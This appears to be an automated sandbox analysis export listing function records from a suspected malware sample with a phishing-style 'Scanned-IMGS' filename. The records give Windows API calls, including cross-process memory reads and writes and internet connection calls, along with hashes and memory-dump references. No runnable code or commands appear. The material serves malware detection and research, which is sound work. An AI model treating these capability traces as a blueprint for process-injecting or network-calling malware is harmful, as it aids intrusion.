• Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
Similarity
• API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
• String ID: LPT
• API String ID: 3222508074-1350329615
• Opcode ID: f0aa2ab85e16c9a4c88adc2fd7f84f19ddfdd43a2b4c61cf97e6fba1dfa295f0
• Instruction ID: a7c80d5cae09364014be8a894efa8ab162a42645902c87a64d55852f0a2375dc
• Opcode Fuzzy Hash: f0aa2ab85e16c9a4c88adc2fd7f84f19ddfdd43a2b4c61cf97e6fba1dfa295f0
• Instruction Fuzzy Hash: BC618475E10215EFCB14EF98C985EAEB7B4EF08710F15446AF546AB391DB70AE80CB60
APIs
• Sleep.KERNEL32(00000000), ref: 00A32AC8
• GlobalMemoryStatusEx.KERNEL32(?), ref: 00A32AE1
Memory Dump Source
• Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
• Opcode ID: 58f63da3a8b2d4848e96303e540c1e13af15031f09fd729aaa8565f6fb3da5dc
• Instruction ID: eb6e4c781bfd4544e1f784a31d36096ca5572515560c473842289d9c4a1f5c2e
• Opcode Fuzzy Hash: 58f63da3a8b2d4848e96303e540c1e13af15031f09fd729aaa8565f6fb3da5dc
• Instruction Fuzzy Hash: 085149714187549BD320AF54EC86BAFBBE8FF84710F42486DF1D9811A5DB30892ACB26
APIs
  • Part of subcall function 00A2506B: __fread_nolock.LIBCMT ref: 00A25089
• _wcscmp.LIBCMT ref: 00A89AAE
• _wcscmp.LIBCMT ref: 00A89AC1
Memory Dump Source
• Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
Similarity
• API ID: _wcscmp$__fread_nolock
• String ID: FILE
• API String ID: 4029003684-3121273764
• Opcode ID: 7fcd0d810acb7a1bbf3e6e79424224d46a66d49802db7106c33e30944b342278
• Instruction ID: 2a134a8fafddf7ed2dcc282c2dd510a4af06135b307aecce6c9aa9f365192789
• Opcode Fuzzy Hash: 7fcd0d810acb7a1bbf3e6e79424224d46a66d49802db7106c33e30944b342278
• Instruction Fuzzy Hash: F641C471A04619BEDF20ABB4DC45FEFBBBDEF49710F04047AF904A7181DA75AA0487A1
APIs
• _memset.LIBCMT ref: 00A92892
• InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00A928C8
Memory Dump Source
• Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
Similarity
• API ID: CrackInternet_memset
• String ID: |
• API String ID: 1413715105-2343686810
• Opcode ID: 5a4284a0ac1627be37b6c3c16911ae05c6f864ec83cab891616eae0cfc2945b4
• Instruction ID: 4e50c8aaf35cb37d512ed7dd60b645a3bd03d5210efe8565ce1092a1e3eeee6c
• Opcode Fuzzy Hash: 5a4284a0ac1627be37b6c3c16911ae05c6f864ec83cab891616eae0cfc2945b4
• Instruction Fuzzy Hash: D2314B71900119AFCF05EFA5DD85EEEBFB9FF08300F104029F815AA166EB315A56DBA0
APIs
• DestroyWindow.USER32(?,?,?,?), ref: 00AA6D86
• MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00AA6DC2
Memory Dump Source
• Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
Similarity
• API ID: Window$DestroyMove
• String ID: static
• API String ID: 2139405536-2160076837
• Opcode ID: c732cffd221ec66ae8ac9c029558322397e36c7e869641f4957c148644ba0f34
• Instruction ID: 23bc84c4db314efadf3cae095a786d743f76cb51efaf0eeaa09c55d41f1f2e27
• Opcode Fuzzy Hash: c732cffd221ec66ae8ac9c029558322397e36c7e869641f4957c148644ba0f34
• Instruction Fuzzy Hash: 9F31AD71210604AEDB10DF78CC80AFB77B9FF49760F148629F9A697190DB31AC92CB60
                                                        APIs
                                                        • _memset.LIBCMT ref: 00A82E00
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00A82E3B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: InfoItemMenu_memset
                                                        • String ID: 0
                                                        • API String ID: 2223754486-4108050209
                                                        • Opcode ID: f32704f1f3bb88d0d7fd405fffc65d9d8b033f70073f5df34b80ee00bb75d5cf
                                                        • Instruction ID: e4f881f8999d364461d17a72d8385f034b3de629a9b315dabbea98a09e828f5e
                                                        • Opcode Fuzzy Hash: f32704f1f3bb88d0d7fd405fffc65d9d8b033f70073f5df34b80ee00bb75d5cf
                                                        • Instruction Fuzzy Hash: 5131E431A00309AFEB24EF58C985BBEBFB9FF45350F14442AE985971A0E7709944CB58
                                                        APIs
                                                          • Part of subcall function 00A3619A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00A361B1
                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00A7B03B
                                                        • _strlen.LIBCMT ref: 00A7B046
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Timeout_strlen
                                                        • String ID: @U=u
                                                        • API String ID: 2777139624-2594219639
                                                        • Opcode ID: 503ab80b42aeb92ab3bf54a64d19444dec7a458d6804c9643a6cd294721790c7
                                                        • Instruction ID: 081cb133ba0378431c36d7ed9fd1d41cec4a147c0019630b97ae37f13af18751
                                                        • Opcode Fuzzy Hash: 503ab80b42aeb92ab3bf54a64d19444dec7a458d6804c9643a6cd294721790c7
                                                        • Instruction Fuzzy Hash: 8F11D5B62142056ACB14AB78DDD6BBF7BA99F85300F00C03EF609DB193DF258D868270
                                                        APIs
                                                          • Part of subcall function 00A8589F: GetLocalTime.KERNEL32 ref: 00A858AC
                                                          • Part of subcall function 00A8589F: _wcsncpy.LIBCMT ref: 00A858E1
                                                          • Part of subcall function 00A8589F: _wcsncpy.LIBCMT ref: 00A85913
                                                          • Part of subcall function 00A8589F: _wcsncpy.LIBCMT ref: 00A85946
                                                          • Part of subcall function 00A8589F: _wcsncpy.LIBCMT ref: 00A85988
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00AA6B6E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _wcsncpy$LocalMessageSendTime
                                                        • String ID: @U=u$SysDateTimePick32
                                                        • API String ID: 2466184910-2530228043
                                                        • Opcode ID: 49e8ebaf1943ea225bcfe2cdeb3fbee6d9f7fd57b219282e9174543f7d861870
                                                        • Instruction ID: 41a56ae7fc254cdd5027f0f66d93d4037d870b5c8901e2bc3c4f7e61475ed033
                                                        • Opcode Fuzzy Hash: 49e8ebaf1943ea225bcfe2cdeb3fbee6d9f7fd57b219282e9174543f7d861870
                                                        • Instruction Fuzzy Hash: 8921E431380208AFEF219F64CC82FEA7369EB55760F144519F950EB1D0D7B1AC418BA0
                                                        APIs
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A79720
                                                          • Part of subcall function 00A818EE: GetWindowThreadProcessId.USER32(?,?), ref: 00A81919
                                                          • Part of subcall function 00A818EE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00A7973C,00000034,?,?,00001004,00000000,00000000), ref: 00A81929
                                                          • Part of subcall function 00A818EE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00A7973C,00000034,?,?,00001004,00000000,00000000), ref: 00A8193F
                                                          • Part of subcall function 00A819CC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A79778,?,?,00000034,00000800,?,00000034), ref: 00A819F6
                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00A79787
                                                          • Part of subcall function 00A81997: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A797A7,?,?,00000800,?,00001073,00000000,?,?), ref: 00A819C1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Process$MemoryMessageSend$AllocOpenReadThreadVirtualWindowWrite
                                                        • String ID: @U=u
                                                        • API String ID: 1045663743-2594219639
                                                        • Opcode ID: 78737175f84c8b6c7e873195d6a980e91b486f70f186f756bd5f4c35fcd16af7
                                                        • Instruction ID: d15989b456e63deb185a2b127d54330df00fb324373d0831e21cb1aee93c105a
                                                        • Opcode Fuzzy Hash: 78737175f84c8b6c7e873195d6a980e91b486f70f186f756bd5f4c35fcd16af7
                                                        • Instruction Fuzzy Hash: C3213E32901129ABEF15EFA4CD41FDABBB8FF09350F1041A6F548E7190DA705A45DBA0
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00AA69D0
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AA69DB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: Combobox
                                                        • API String ID: 3850602802-2096851135
                                                        • Opcode ID: cc46ba2d61ea53f0785e04ac6892fc929cc2ac7a47be10ae9975748e9971bb23
                                                        • Instruction ID: 7595aa0414afa4b4eaafb9fbe6c55267f2abcb9366d561844f251add38ea2430
                                                        • Opcode Fuzzy Hash: cc46ba2d61ea53f0785e04ac6892fc929cc2ac7a47be10ae9975748e9971bb23
                                                        • Instruction Fuzzy Hash: 0711B271600209AFEF159F54CC80EFB376EEB9A3A4F190129F9589B2D0D7719C518BA0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @U=u
                                                        • API String ID: 0-2594219639
                                                        • Opcode ID: 3f69d08afd2e9ce1d4f1aed39448f55b4dff7747544129f5cf91fd27ece8466d
                                                        • Instruction ID: ace1b24fcdd4a934baac50490fbf789e0d9cbc7b2e68ef27552a75a7919c0acf
                                                        • Opcode Fuzzy Hash: 3f69d08afd2e9ce1d4f1aed39448f55b4dff7747544129f5cf91fd27ece8466d
                                                        • Instruction Fuzzy Hash: 92216D35204258BFEB15DF588C45FBB37A4EB0A390F14415AFA16EB1E1D770D9129B60
                                                        APIs
                                                          • Part of subcall function 00A21D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A21D73
                                                          • Part of subcall function 00A21D35: GetStockObject.GDI32(00000011), ref: 00A21D87
                                                          • Part of subcall function 00A21D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A21D91
                                                        • GetWindowRect.USER32(00000000,?), ref: 00AA6EE0
                                                        • GetSysColor.USER32(00000012), ref: 00AA6EFA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                        • String ID: static
                                                        • API String ID: 1983116058-2160076837
                                                        • Opcode ID: 7d17ea6c0741ae8b89b49c34569259802ed3c752b5cba9df179903ec6812eac9
                                                        • Instruction ID: a14a84c37db7db7626de664c6160c8c56232ff9aad459f0f6f02173cfa094897
                                                        • Opcode Fuzzy Hash: 7d17ea6c0741ae8b89b49c34569259802ed3c752b5cba9df179903ec6812eac9
                                                        • Instruction Fuzzy Hash: 7321597261020AAFDB04DFA8DD45AEA7BB8FB09314F044629FA55D3290D734E8619B60
                                                        APIs
                                                        • _memset.LIBCMT ref: 00A82F11
                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00A82F30
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: InfoItemMenu_memset
                                                        • String ID: 0
                                                        • API String ID: 2223754486-4108050209
                                                        • Opcode ID: 840ebdd4ac7cfd067a6c8a9c4179a040b7deee5fdb4a08b54fa78258ce122bf5
                                                        • Instruction ID: 4b9e502182165255e12db3d1899e3d3055318375b70949c288662d46e09c6834
                                                        • Opcode Fuzzy Hash: 840ebdd4ac7cfd067a6c8a9c4179a040b7deee5fdb4a08b54fa78258ce122bf5
                                                        • Instruction Fuzzy Hash: 0B11EF32D01214ABDB20FB98DC44BB977B9FB11350F0880B6EA44AB2A0D7B0AE15C795
                                                        APIs
                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00A92520
                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00A92549
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Internet$OpenOption
                                                        • String ID: <local>
                                                        • API String ID: 942729171-4266983199
                                                        • Opcode ID: 5ef8f9a9496e715eb18f871a1f1614511ab97acf69ca1097e86e6180a5c0988a
                                                        • Instruction ID: d46b828c5fcfa143120c578fb8ac0595bc3fb6f0c98032e06e5a7cfe30cad28f
                                                        • Opcode Fuzzy Hash: 5ef8f9a9496e715eb18f871a1f1614511ab97acf69ca1097e86e6180a5c0988a
                                                        • Instruction Fuzzy Hash: ED11A070641225BEDF248F618C99FFBFFA8FB16751F10812AF90586140D374A981DBE0
                                                        APIs
                                                        • SendMessageW.USER32(?,?,?,?), ref: 00AA879F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: @U=u
                                                        • API String ID: 3850602802-2594219639
                                                        • Opcode ID: 136f35db256c8edd759b2007808975b84eff219d080f5b6d4381dbd616ece9f8
                                                        • Instruction ID: 9e00503af5be3e83c558e86dc250c53dcce9665b4c5abc6b1e61fc536cc7e2ee
                                                        • Opcode Fuzzy Hash: 136f35db256c8edd759b2007808975b84eff219d080f5b6d4381dbd616ece9f8
                                                        • Instruction Fuzzy Hash: 1221F67960010AEF8B15DF98D880CEA7BB5FB4D340B144159FD05A73A0DB35ED61DBA0
                                                        APIs
                                                        • SendMessageW.USER32(?,00000401,?,00000000), ref: 00AA689B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: @U=u$button
                                                        • API String ID: 3850602802-1762282863
                                                        • Opcode ID: 9f6c067c71149d4b56ef535c54eabfc17a45c71fc0578c2004696157ad49510b
                                                        • Instruction ID: 8fcac1c5f0bb725457e1743954c7417f4c765f8b427f2d06d6f8855613af56e7
                                                        • Opcode Fuzzy Hash: 9f6c067c71149d4b56ef535c54eabfc17a45c71fc0578c2004696157ad49510b
                                                        • Instruction Fuzzy Hash: DE11E132150205ABDF019FA0CC41FEA376EFF1D314F190518FA50A71D0C73AE8919B60
                                                        APIs
                                                        • SendMessageW.USER32(?,0000133E,00000000,?), ref: 00AA7B47
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: @U=u
                                                        • API String ID: 3850602802-2594219639
                                                        • Opcode ID: eeafcb1186a76bfaeaa9ee71ac06d84d4bdfee5f3fa0f2bc50fecd6b9e6569fb
                                                        • Instruction ID: 732e0f0f4fbc8fb88686b5d6269d345aac30d6ecb7b2a9542256c452fa90f73d
                                                        • Opcode Fuzzy Hash: eeafcb1186a76bfaeaa9ee71ac06d84d4bdfee5f3fa0f2bc50fecd6b9e6569fb
                                                        • Instruction Fuzzy Hash: B011D070504344AFDB20DF74C891AEBBBE9BF06310F10891DE9AB572D1DB7169419B60
                                                        APIs
                                                          • Part of subcall function 00A9830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00A980C8,?,00000000,?,?), ref: 00A98322
                                                        • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00A980CB
                                                        • htons.WSOCK32(00000000,?,00000000), ref: 00A98108
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWidehtonsinet_addr
                                                        • String ID: 255.255.255.255
                                                        • API String ID: 2496851823-2422070025
                                                        • Opcode ID: 6b5dfa24c013008b540fb8a0b5063c5deafc3e3b685a1735af3b0d26bac8d635
                                                        • Instruction ID: aa55111a3b7fcead40255ab2b004014a813b1b108f375a7bd035e799972f8a86
                                                        • Opcode Fuzzy Hash: 6b5dfa24c013008b540fb8a0b5063c5deafc3e3b685a1735af3b0d26bac8d635
                                                        • Instruction Fuzzy Hash: EA11E534600215ABCF20EFA4CC86FBEB374FF05320F208527E915972D1DB31A811C651
                                                        APIs
